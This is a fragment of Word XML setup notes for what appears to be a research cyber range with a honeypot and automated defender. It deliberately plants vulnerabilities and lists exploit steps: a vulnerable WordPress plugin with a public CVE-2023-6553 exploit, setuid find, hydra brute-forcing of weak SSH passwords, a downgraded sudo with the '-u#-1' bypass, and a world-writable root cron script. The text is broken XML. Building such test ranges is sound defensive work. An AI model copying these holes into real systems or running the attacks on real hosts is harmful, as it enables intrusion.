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exwixhrtk" w:id="0"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Refer to This Document in Addition to the previous Network Set-up documentation for set-up instructions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pyaeth7wf87" w:id="1"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Setting up Public Servers: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with Ubuntu 22.04 and assigned Public IP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Port 17737 is open for Custom TCP from any IP (can edit this in Security Group of EC2)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Install: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https://ubuntu.com/tutorials/install-and-configure-wordpress#4-configure-apache-for-wordpress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Wordpress.config file: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&lt;VirtualHost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ServerAdmin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webmaster@localhost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DocumentRoot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/var/www/html/wordpress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yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;server 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ServerAlias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www.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yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;server 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DocumentRoot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AllowOverride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DirectoryIndex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/srv/www/wordpress/wp-content/plugins/backup-backup&gt;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/srv/www/wordpress/wp-content/plugins/backup-backup/includes&gt;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&lt;/Directory&gt;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&lt;/VirtualHost&gt;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Plug-in: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https://downloads.wordpress.org/plugin/backup-backup.1.3.7.zip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Foothold Exploit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local machine, Git Clone Exploit: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https://github.com/Chocapikk/CVE-2023-6553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virtual env (steps in Additional Configuration), run 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Exploit.py with intended URL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Escalation Exploit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Set-up, run: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chmod u+s /usr/bin/find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exploit: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z7lz0p6pux6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5hledqfq9olo" w:id="3"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Setting up Web &amp; PCs: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EC2 instances with its own subnet, unreachable from public subnet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SSH login by allowing port 22 to be open to any IP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SSH Exploit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set up, Run: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user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2. To exploit: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printf "root\nadmin\nuser\n" &gt; users.txt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printf "root\npassword\npass\n" &gt; passwords.txt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hydra -L users.txt -P passwords.txt ssh://[TARGET IP] # gives login credentials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ssh [USERNAME]@[TARGET IP]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Escalation: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To set up, Run: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export SUDO_FORCE_REMOVE=yes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apt remove sudo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wget https://github.com/sudo-project/sudo/releases/download/SUDO_1_8_27/sudo_1.8.27-1_ubu1804_amd64.deb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dpkg -i </w:t>
      </w:r>
      <w:hyperlink r:id="rId9">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">sudo_1.8.27-1_ubu1804_amd64.deb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echo 'user ALL=(ALL,!root) /bin/bash' &gt;&gt; /etc/sudoers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exploit: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-u#-1 /bin/bash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o59ftllir7cm" w:id="4"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Setting up DB: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Details of Instance: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Exploit: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set up, Run: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echo "cp /var/backup.sh /root/backup.sh" &gt; /var/backup.sh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chmod 777 /var/backup.sh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crontab -e # add this line: * * * * * /bin/bash /var/backup.sh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s2wrzhai407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rqudblv7sipz" w:id="6"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Setting up NTP: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https://vitux.com/how-to-install-ntp-server-and-client-on-ubuntu/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b8h62ib9pzd" w:id="7"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Configuration of All Machines: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These steps are meant to be run for every EC2 instance in the network, except the Controller instance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Set-up Virtual Environment and install dependencies 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35.99999999999994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python3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daedalus_network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 daedalus_network</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/bin/activate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sudo nano ~/.bashrc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[add “source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cowrie-env/bin/activate” to last line]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[Ctrl+X, Y, and Enter to save]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pip install grpcio protobuf inotify</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000067">
      <w:pPr>
        <w:spacing w:line="335.99999999999994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Set-up User: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su root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addusuer user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password: “password”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sudo nano /etc/ssh/sshd_config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PasswordAuthentication yes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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KbdInteractiveAuthentication yes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ssh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Set-up Cowrie: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libssl-dev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libffi-dev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build-essential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libpython3-dev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python3-minimal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authbind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virtualenv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sudo su user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git clone </w:t>
      </w:r>
      <w:hyperlink r:id="rId11">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">http://github.com/cowrie/cowrie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cd cowrie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sed -i 's/2222/22/g' etc/cowrie.cfg.dist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echo "user:x:password" &gt; etc/userdb.txt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python3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--upgrade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line="33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python3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--upgrade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line="335.9999999999999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permission errors, try “sudo chown -R user:user /home/user” this gives permissions to user to install packages</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000080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“Real” and “Fake” Data, for File Watching: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sudo su root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sudo touch /root/important_data.txt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sudo chmod 600 /root/important_data.txt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echo "Important data goes here." | sudo tee /root/important_data.txt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sudo touch /root/valuable_data.txt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sudo chmod 600 /root/valuable_data.txt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echo "This is fake data." | sudo tee /root/valuable_data.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008A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oibszzsflczc" w:id="8"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Setting up Defender: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EC2 Instance that has no inbound traffic and allows all outbound traffic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https://github.com/ronydahdal/daedalus_network.git</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> onto every EC2 instance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set up gRPC client in order for defender to take actions, run on every machine except controller instance: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2024REUSE/daedalus_network/c2 &amp;&amp; sudo python3 c2_server.py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errors of packages come up, pip install them, which might require a few work-arounds. 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workaround is that you need to install pip packages as:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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9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pip3 install numpy protobuf inotify grpcio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automatic attacker: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MBPO Defender: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ial10ashre34" w:id="9"/>
      <w:bookmarkEnd w:id="9"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Optional (but helpful) VSCode SSH AWS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Remote - SSH extension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Configuration file and add EC2 instance and key (key made from when instance was launched)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aws-ec2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ec2-18-117-172-172.us-east-2.compute.amazonaws.com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ubuntu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IdentityFile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~/Downloads/public.pem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this host using VSCode’s Extension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cowrie/cowrie" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://vitux.com/how-to-install-ntp-server-and-client-on-ubuntu/" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ronydahdal/daedalus_network.git" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/sudo-project/sudo/releases/download/SUDO_1_8_31/sudo_1.8.31-1_ubu1804_amd64.deb" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ubuntu.com/tutorials/install-and-configure-wordpress#4-configure-apache-for-wordpress" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://downloads.wordpress.org/plugin/backup-backup.1.3.7.zip" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Chocapikk/CVE-2023-65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